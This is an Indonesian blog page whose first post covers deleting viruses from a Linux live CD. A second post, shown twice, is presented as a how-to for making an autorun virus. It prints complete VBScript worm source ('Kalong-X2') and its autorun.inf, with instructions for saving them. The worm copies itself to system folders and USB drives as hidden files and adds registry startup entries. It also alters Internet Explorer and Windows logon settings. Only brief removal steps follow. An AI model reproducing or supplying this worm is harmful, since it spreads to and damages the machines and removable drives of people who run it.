Sabtu, 26 Februari 2011
Jumat, 25 Februari 2011
cara menghapus virus
Dibandingkan dengan saat pertama kali virus komputer muncul di PC pada tahun 1986, ternyata virus komputer generasi sekarang jauh lebih mudah untuk dibasmi. Berbeda dengan virus komputer generasi pertama yang lebih banyak menyerang dan bersembunyi pada master boot record (MBR) dan program executable (.exe dan .com), virus komputer generasi sekarang ternyata lebih banyak ‘menonjolkan diri’ … sehingga menjadi mudah terlihat dan tentu saja menjadi semakin mudah untuk dibasmi.
Virus generasi pertama dibuat dengan menggunakan assembly language (bahasa mesin) sehingga mempunyai kemampuan menyembunyikan diri, bahkan di tempat sulit seperti di MBR ataupun di file executable. Sedangkan virus modern biasanya dibuat dengan m
enggunakan script language (misal VB Script) – yang secara tehnis berada di bawah tingkat assembly language – sehingga virus-virus ini tidak terlalu pintar menyembunyikan diri.
Di komputer dengan sistem operasi Windows, virus ini memang terlihat cukup ahli menyembunyikan diri. Sebagai contoh, digambar samping virus menyamar sebagai file executable. Hal ini dilakukan karena virus modern tidak bisa bersembunyi di dalam file executable (cmiiw), sehingga yang bisa dilakukan hanyalah sebatas melakukan penyamaran.
Namun Anda bisa melihat virus komputer ini dengan sangat jelas jika Anda menggunakan sistem operasi Linux (NB: Anda tidak diharuskan menginstall Linux untuk melakukan ini … cukup menggunakannya secara Live dari Live CD / DVD 3D OS).
Gambar diatas memperlihatkan virus-virus yang ‘tertangkap basah’ di file manager Konqueror dari Linux. Nah, virus-virus komputer ini bisa Anda hapus – tanpa menggunakan program bantu apapun – dengan mudahnya seperti menghapus file-file biasa, yaitu dengan menggunakan tombol Del.
Bandingkan jika Anda menggunakan program anti virus, sekalipun nantinya virus bisa terdeteksi, namun cukup banyak waktu berharga Anda yang terbuang hanya untuk men-scan keberadaan virus-virus ini.
Gambar berikut memperlihatkan tertangkapnya virus-virus tersebut oleh program KlamAV (di Linux) dan PCMAV (di Windows).
Jika diperhatikan, pada screenshot PCMAV (klik gambar untuk memperbesar) ternyata ada virus yang belum bisa ditangani oleh PCMAV (versi terakhir saat artikel ini dibuat).
Dengan menggunakan cara ini, Anda bahkan bisa menghapus virus yang belum ada penangkalnya tanpa perlu menunggu hadirnya antivirus terbaru lagi.
Menarik …?!!!
Virus generasi pertama dibuat dengan menggunakan assembly language (bahasa mesin) sehingga mempunyai kemampuan menyembunyikan diri, bahkan di tempat sulit seperti di MBR ataupun di file executable. Sedangkan virus modern biasanya dibuat dengan m
enggunakan script language (misal VB Script) – yang secara tehnis berada di bawah tingkat assembly language – sehingga virus-virus ini tidak terlalu pintar menyembunyikan diri.Di komputer dengan sistem operasi Windows, virus ini memang terlihat cukup ahli menyembunyikan diri. Sebagai contoh, digambar samping virus menyamar sebagai file executable. Hal ini dilakukan karena virus modern tidak bisa bersembunyi di dalam file executable (cmiiw), sehingga yang bisa dilakukan hanyalah sebatas melakukan penyamaran.
Namun Anda bisa melihat virus komputer ini dengan sangat jelas jika Anda menggunakan sistem operasi Linux (NB: Anda tidak diharuskan menginstall Linux untuk melakukan ini … cukup menggunakannya secara Live dari Live CD / DVD 3D OS).
Gambar diatas memperlihatkan virus-virus yang ‘tertangkap basah’ di file manager Konqueror dari Linux. Nah, virus-virus komputer ini bisa Anda hapus – tanpa menggunakan program bantu apapun – dengan mudahnya seperti menghapus file-file biasa, yaitu dengan menggunakan tombol Del.
Bandingkan jika Anda menggunakan program anti virus, sekalipun nantinya virus bisa terdeteksi, namun cukup banyak waktu berharga Anda yang terbuang hanya untuk men-scan keberadaan virus-virus ini.Gambar berikut memperlihatkan tertangkapnya virus-virus tersebut oleh program KlamAV (di Linux) dan PCMAV (di Windows).
Jika diperhatikan, pada screenshot PCMAV (klik gambar untuk memperbesar) ternyata ada virus yang belum bisa ditangani oleh PCMAV (versi terakhir saat artikel ini dibuat).
Dengan menggunakan cara ini, Anda bahkan bisa menghapus virus yang belum ada penangkalnya tanpa perlu menunggu hadirnya antivirus terbaru lagi.Menarik …?!!!
Similar Posts:
mbuat dan Menghapus Virus Autorun tanpa Antivirus
Artikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sampel virus ini yaitu virus dengan nama k4l0n6 yang telah menginfeksi PC gw. Adapun cara membuat virus autorun sebagai berikut:1. script coding pertama[autorun]
shellexecute=wscript.exe k4l0n6.sys.vbs
simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)
2. script coding kedua
‘Kalong-X2
‘Varian dari Kalong.VBS
on error resume next
‘Dim kata-kata berikut
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd
‘siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.sys.vbs”
set longka = createobject(“Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
‘sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\k4l0n6.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘Manipulasi Registry
set kalong = createobject(“WScript.Shell”)
‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: X2 ATTACK ::”
‘Ubah tulisan pertama pada text box menu RUN
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “KALONG-X2/1″
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”
‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “KALONG-X2″
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Komputer Anda Diambil Alih”
‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”
‘Ubah Default Start Page Internet Explorer
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.vaksin.com”
‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)
secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.
Adapun cara menanggulangi virus tersebut yaitu dengan cara
- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK
- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut
- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)
- setelah itu, file tersebut dihapus/di delete dari komputer
semoga tulisan ini, bisa bermanfaat dan berguna untuk semua orang.
Artikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sampel virus ini yaitu virus dengan nama k4l0n6 yang telah menginfeksi PC gw. Adapun cara membuat virus autorun sebagai berikut:1. script coding pertama[autorun]
shellexecute=wscript.exe k4l0n6.sys.vbs
simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)
2. script coding kedua
‘Kalong-X2
‘Varian dari Kalong.VBS
on error resume next
‘Dim kata-kata berikut
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd
‘siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.sys.vbs”
set longka = createobject(“Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
‘sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\k4l0n6.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘Manipulasi Registry
set kalong = createobject(“WScript.Shell”)
‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: X2 ATTACK ::”
‘Ubah tulisan pertama pada text box menu RUN
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “KALONG-X2/1″
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”
‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “KALONG-X2″
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Komputer Anda Diambil Alih”
‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”
‘Ubah Default Start Page Internet Explorer
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.vaksin.com”
‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)
secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.
Adapun cara menanggulangi virus tersebut yaitu dengan cara
- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK
- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut
- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)
- setelah itu, file tersebut dihapus/di delete dari komputer
semoga tulisan ini, bisa bermanfaat dan berguna untuk semua orang.
Rabu, 23 Februari 2011
Selasa, 15 Februari 2011
Minggu, 13 Februari 2011
Langganan:
Postingan (Atom)
Entri Populer
-
Mengetik 10 Jari kedengarannya mudah, padahal masih banyak sekali orang-orang yang masih mengetik dengan 11 jari ( telunjuk kiri dan telu... -
NO NAMA KELAS WEBSITE 1 Acep Sahyana XI TI aceup_aceup.blogspot.com 2 Asep Chandra XI TI Kevinchandra.blogspot....
-
http://www.indowebster.com
-
http://a.tribalfusion.com/p.media/aEmMfjorBxPrbsYE3n5qUk2TM0manG1r3bUWrSoAnZbmGfnoWfF2qri3dEm3AFKnFMZa0GUVYV34XGZbMpaBR2U3WTUnZaVm71REr3PsZb...
-
http://www.youtube.com/watch?v=ZS4PfHJeFyc
-
welcome
-
Tulisan ini hanya berupa pencegahan dan menghambat perkembangan virus di komputer yang memiliki operasi system Windows, bukan untuk pembers...
-
mbuat dan Menghapus Virus Autorun tanpa Antivirus Artikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sam...
-
<a href="http://photobucket.com/images/snyster" target="_blank"><img src="http://i410.photobucket.com/albu...
